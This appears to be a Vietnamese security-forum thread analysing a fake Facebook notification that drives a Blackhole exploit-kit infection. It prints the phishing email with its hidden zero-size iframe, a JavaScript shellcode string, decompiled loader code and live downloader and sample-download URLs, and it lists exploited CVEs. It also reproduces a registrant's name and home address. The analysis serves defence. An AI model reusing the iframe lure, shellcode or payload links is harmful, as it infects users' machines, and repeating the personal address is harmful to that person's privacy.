Troy Stein commented on your status:

"*** *** ***** ** ****"


To see the comment thread, follow the link below:
http://www.totaly.de/facebook/?profile.php&id=9037&v=feed&story_fbid=33601747715388

Thanks,
The Facebook Team 

<iframe src="http://fb-sv10.co.uk/main.php?page=95fc4549d83b0486" width="0" height="0"></iframe>
<meta HTTP-EQUIV="REFRESH" content="5; url=http://facebook.com/"> 

function getShellCode() {
        return "%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u57e9%u80fe%u2830%ue240%uebfa%ue805
%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b
%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c
%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469
%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376
%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71
%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7
%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3
%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7
%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e
%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835
%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969
%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b
%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e
%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732
%u4058%u5c5c%u1258%u0707%u4a4e%u5b05%u195e%u0618%u474b%u5d06%u0743%u065f%u4058%u1758%u154e%u184b%u4b19%u0e1d%u154d%u2819%u0028";
    }

䅁䅁荦ﳤ堐줱腦埩胾⠰￫￿청ᱝ矁ꍌᡨ梣ꌤ㑘ꍾ⁞ꍎᑶ尫Л용㠽ퟗꎐᡨ滫⸑퍝Ჯ괌巌셹擃繹嶣ꌔᵜ⭐绝庣⬈ᯝ懡푩⮅ᯭ⟳
㢖�⁜⬥棲�㜓칝ꍶ౶ꍎ挤溥ퟄ౼ꌤ⯰ꏵꌬ皃篃ꎅࡀ喨ᬤ⭜쎾ꏛ⁀�ⵂ쁱ힰퟗ퇊⣀⠨瀨䉸䁨⣗⠨ꭸ㇨絸쒣皣ꬸⷫ쯗䝀⡆䀨婝䕄흼ꬾ⃬
삣䧀ퟗ쏗쌪꥚Ⳅ⠩ꔨ౴బ䵚孏泯Ⰼ婞ᨛ泯‌Ԉ࡛䁻⣐⠨绗ꌤᯀ秡泯⠵塟届泯ⴵ䰆䑄泮ℵ焨ᠬ沠ⰵ祩⡂⡂罻⡂绗괼巨䈾笨绗䈬ꬨⓃ흻
Ȿ쌤쌪漻ឨ崨濒ឨ崨䋬䈨ퟖ⁾듀ퟖꛗ♦냄ꋖꄦ⥇ᮕꋢ㍳滮ṑܲ䁘屜ቘ܇䩎嬅ᥞؘ䝋崆ٟ݃䁘᝘ᕎᡋ䬙ฝᕍ⠙(

Hì hì, có TQN say xỉn này liền anh. Nói ông anh anh chửi, vạch mặt thằng đó đi. Định chơi JavaScript exploit à ? Exploit đó tên JS/Exploit-Blacole.al. Bà con google ra thì thấy.
Kết quả phân tích file .php đó đây (nhờ máy làm cho khoẻ cho rồi):
http://wepawet.cs.ucsb.edu/view.php?hash=236c22c7ba122ba97cee01ee04017968&type=js
loài ra một con downloader: http://fb-sv10.co.uk/w.php?f=c01c5&e=1, được download về %Temp% dir với tên: wpbt0.dll.
Em đã chụp được em nó, đang unpack, nhưng giờ phải đi rồi.
Anh nói anh anh cô lập máy ngay, ngắt Internet ngay. Tạm thời tháo cất cái ổ cứng đó đi. Nguy hiểm. KAV 2011 của em không phát hiện ra virus trong file main.php và wpbt0.dll.
Nay lại lòi ra thêm cái trò comment trên FB = link exploit Integer Overflow của Firefox, browser nữa à ! Kinh thật, đúng là quá lỳ lợm, = mọi giá ! 

void EntryPoint(void) {
        asm{ push       ebp };
        temp_0 = rbp;
        rbp = rsp;
        var_m8 = 0xdf2efc3;
        *0x40b01c = 0x2bb;
        if (*0x40c41c != 0x2d3c4f52) {

            loc_4027c6:
                asm{ adc        dword [ds:0x408774], 0x40CAA9 };
                *0x408770 = *0x408770 - 0x1c1d;
                var_m4 = &var_m12;
                *0x40b0b0 = *0x40b0b0 & 0x78e9;
                *0x40c31c = &var_4;
                *0x408774 = *0x408774 & 0x0;
                goto loc_40280c;
        }

    loc_4027b2:
        *0x408768 = *0x408768 | 0x40b070;
        *0x40c41c = 0x0;
        goto loc_4027c6;

    loc_40280c:
        if (!CARRY(*0x408774 - 0x18)) {
                rax = *0x40c320;
                if (*0x40c320 != 0x0) {

                    loc_402873:
                        *0x40ca9d = *0x40ca9d & 0x0;
                        goto loc_402890;
                }
                rax = 0x0;
                rax = rax + *0x40b07c;
                *0x408760 = *0x408760 + rax + CARRY(rax + *0x40b07c);
                *0x40b0ac = *0x40b0ac | 0x467;
                *0x40c320 = **0x40c31c;
                goto loc_402873;
        }
        if (*0x408774 != 0x1d) {
                goto loc_402801;
        }
        asm{ push       dword [ss:ebp-0x0+var_m12] };
        asm{ push       0x6A1C };
        asm{ push       dword [ss:ebp-0x0+var_m12] };
        asm{ call       dword [ds:imp_VerifyVersionInfoW] };
        __FCT_PARAMETER__[0] = var_m12;
        __FCT_PARAMETER__[1] = 0x6a1c;
        __FCT_PARAMETER__[2] = var_m12;

    loc_402801:
        *0x408774 = *0x408774 + 0x1;
        goto loc_40280c;

    loc_402890:
        if (!CARRY(*0x40ca9d - 0x1b)) {
                asm{ sbb        dword [ds:0x40B074], 0x40B07C };
                *0x40c310 = *(*0x40c31c + 0x4);
                *0x40c314 = *(*0x40c31c + 0x8);
                *0x40c318 = *(*0x40c31c + 0xc);
                *0x40c2e0 = *0x40c310;
                *0x40c2e8 = *0x40c318;
                *0x40c2e4 = *0x40c314;
                *0x40c1b0 = 0x40c038;
                *0x40c2ec = var_m4;
                rax = fct_4029ad();
                *var_m4 = **0x40c2ec;
                var_m8 = 0x0;
                if (*0x40c230 != var_m8) {
                        *0x40c228 = *0x40c228 ^ *0x40c230;
                        *0x40c230 = var_m8;
                        **0x40c31c = **0x40c31c + *0x40c228;
                        return;
                }
                else {
                        *0x40c228 = *0x40c230;
                        **0x40c31c = *0x40c320;
                        return;
                }
        }
        else {

            loc_40289d:
                if (*0x40ca9d != 0x6) {

                    loc_4028ba:
                        if (*0x40ca9d != 0x5) {
                                goto loc_402882;
                        }
                        *0x40ca9d = *0x40ca9d + 0x1;
                        goto loc_402882;
                }
                asm{ push       0x37DF };
                asm{ push       0x7323 };
                asm{ call       dword [ds:imp_GetCommProperties] };
                __FCT_PARAMETER__[0] = 0x7323;
                __FCT_PARAMETER__[1] = 0x37df;
                goto loc_4028ba;
        }
        goto loc_40289d;

    loc_402882:
        rax = rax + 0x1;
        *0x40ca9d = rax;
        goto loc_402890;
}

Dà, giờ em đi làm rồi, tính về nhà nghỉ một chút mà mấy anh đấy lại làm em mất giấc ngủ trưa rồi. Tội tụi em quá mấy anh. Mấy anh cứ quậy suốt vầy không chán sao. Lòi cái nào ra bị thì bị chụp cái đó mà. Em cũng ngán mấy anh tới tận cổ rồi.
Cái wrap đó không phải là code thực đâu anh conmale. Nghi binh bên ngoài đó, phải debug, trace vào thật sâu mới lòi ra code VC++ của mấy anh "người quen mà chưa bao giờ gặp" này. 

Forbidden

You don't have permission to access /facebook/ on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. 

Dà, giờ em đi làm rồi, tính về nhà nghỉ một chút mà mấy anh đấy lại làm em mất giấc ngủ trưa rồi. Tội tụi em quá mấy anh. Mấy anh cứ quậy suốt vầy không chán sao. Lòi cái nào ra bị thì bị chụp cái đó mà. Em cũng ngán mấy anh tới tận cổ rồi.
Cái wrap đó không phải là code thực đâu anh conmale. Nghi binh bên ngoài đó, phải debug, trace vào thật sâu mới lòi ra code VC++ của mấy anh "người quen mà chưa bao giờ gặp" này. 

Em không tải được file wpbt0.dll, KIS 2012 nó chặn địa chỉ này, tắt KIS dow từ http://fb-sv10.co.uk/w.php?f=c01c5&e=1 được 1 file info.exe file này hình như code bằng Delphi, không biết đang chơi trò gì nữa, không lẽ có random nứa sao.

File ở đây:

http://www.mediafire.com/?wt99t6vpk39kasz

Pass là: malware 

Good job onlyida. Cậu hảy mô tả sơ sơ quá trình unpack để lấy được PE nhúng trong info.exe cho bà con biết.
 

Sao đợt này code phức tạp, mã hoá, obfuscated tùm lum vầy nè. Em có lộn không, sao lại thấy có mùi code cao cấp của hacker Nga trong đây. Chiều giờ nó quần em đuối luôn, sinh EXE trong bộ nhớ và harddisk tá lã, rồi xài code inject để download nữa. Mà lạ là cái máy cùi ngoài xưỡng em, cài MS Essential lại bắt hết.
Rầu, nhanh thiệt, mấy anh lại ngồi túc trực HVA này, em wget http://fb-sv10.co.uk/w.php?f=c01c5&e=1 không được, mấy anh chơi xoá mất tiêu rầu. Mới chưa được 2 tiếng đồng hồ.
Em lại sơ ý để MS AV xoá mất tiêu file wpbt0.dll nữa rồi. Bà con ai down kịp share lại giúp em cái ! Ngày mai em làm tiếp, làm cho ra. Giờ thì em út gọi đi nhậu mới chết, nói: em làm mồi nhậu cho anh nè, nhớ anh quá. Theo bà con thì ngồi RCE hay đi nhậu đây ? 

Em không tải được file wpbt0.dll, KIS 2012 nó chặn địa chỉ này, tắt KIS dow từ http://fb-sv10.co.uk/w.php?f=c01c5&e=1 được 1 file info.exe file này hình như code bằng Delphi, không biết đang chơi trò gì nữa, không lẽ có random nứa sao.

File ở đây:

http://www.mediafire.com/?wt99t6vpk39kasz

Pass là: malware 

Hay là hacker Nga, TQ, VN share nhau kỹ thuật đây ? 

TQN wrote:

Hay là hacker Nga, TQ, VN share nhau kỹ thuật đây ? 

để ý thì thấy anh em với nhau cả 

Quân ta bây giờ cũng đông, thiện chiến không kém gì mấy anh em kia rồi. Ha ha, say rồi, nói đùa vài câu cho vui. Giờ thì em đã yên tâm gác kiếm ! 

Registrant:
Annette Kathleen Fisher

Registrant type:
UK Individual

Registrant's address:
183 Albion Way
Verwood
Dorset
BH31 7LT
United Kingdom

Registrar: Fasthosts Internet Ltd [Tag = LIVEDOMAINS]
URL: http://www.fasthosts.co.uk 

fb-sv07.co.uk
Port 22: SSH-2.0-OpenSSH_5.3
Port 80: nginx/0.8.54
---> http://fb-sv07.co.uk/installation/index.php

fb-sv09.co.uk
Port 22: SSH-2.0-OpenSSH_5.1p1 Debian-5
Port 80: Server: nginx/0.6.32

fb-sv10.co.uk
Port 22: SSH-2.0-OpenSSH_5.4p1_hpn13v11 FreeBSD-20100308
Port 25: 220 alexander2kupalo.ru ESMTP Sendmail 8.14.5/8.14.5; Sat, 14 Apr 2012 05:51:09 GMT
Port 80: Server: nginx/1.1.18
 

fb-sv07.co.uk (83.69.226.219)
LTD AWAX Telecom
Moscow, Orlovo-Davydovsky per., 2/5 str
129110 Moscow, Russia
+7 495 6264747
+7 495 6264747

fb-sv10.co.uk (79.137.213.115)
Digital Network NOC
13a, Yaroslavskaya st.,
Moscow, Russia, 129366
+7 495 660 8383
+7 495 660 8383

fb-sv02.com (146.185.249.34)
Petersburg Internet Network ltd.
PIN ROLE
Russia, SPb, Sedova 80
 

http://google.com/safebrowsing/diagnostic?site=zaminnews.com/
Malicious software is hosted on 5 domain(s), including fb-sv06.co.uk/, fb-sv04.co.uk/, fb-sv02.com/.
1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including fb-sv02.com/

http://google.com/safebrowsing/diagnostic?site=eccie.net/
Malicious software includes 35 trojan(s), 31 scripting exploit(s). Successful infection resulted in an average of 7 new process(es) on the target machine.
Malicious software is hosted on 3 domain(s), including nl.ai/, update-kb18628311.com/, fb-sv03.co.uk/.

http://google.com/safebrowsing/diagnostic?site=update-kb18628311.com/
Malicious software includes 92 trojan(s), 48 scripting exploit(s).
 

CVE-2006-0003
MS06-014 for lE6/Microsoft Data Access Components (MDAC) Remote Code Execution

CVE-2007-5659/2008-0655
PDF Exploit -collab, collectEmaillnfo

CVE-2008-2992
PDF Exploit• util.printf

CVE-2009-0927
PDF Exploit- collab.getlcon

CVE-2010-0188
PDF Exploit - LibTiff Integer Overflow

CVE-2010-0842
JAVA MIDI Java OBE
Unspecified vulnerability in the Sound component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27

CVE-2010-1885
Help Center URL Validation Vulnerability

CVE-2011-0559
Flash 10 by exm
Denial of service (memory corruption) via crafted parameters

CVE-2011-3544
Vulnerability in the Rhino Script Engine

CVE-2012-0507
Java Atomic

CVE-2010-0840
JAVA TC (?) javagetval OBE Java invoke / Java Trust
Trusted Method Chaining - Java getValue Remote Code Execution

CVE-2010-0886
Java SMB / Java JDT in Oracle Java SE and Java for Business JDK and JRE 6 Upd 10-19 * Requires xtra components

CVE-2010-3552
JAVA SKYLINE
Unspecified vulnerability in the New Java Plug-in – Java 6 < Update 22 – IE Only – ALL Windows 

1,500 usd/1 năm
1,000 usd/6 tháng
700 usd/3 tháng 

Danh sách các Exploit Kit và CVE:
http://www.mediafire.com/?vwizwswtwx9p1q3

Deconstructing the Black Hole Exploit Kit
http://blog.imperva.com/2011/12/deconstructing-the-black-hole-exploit-kit.html

Blackhole 1.2.3 released
http://xylibox.blogspot.com/2012/03/blackhole-v123.html
...in config.php change value of 'ExploitsDir' to 'data'(old value was 'content').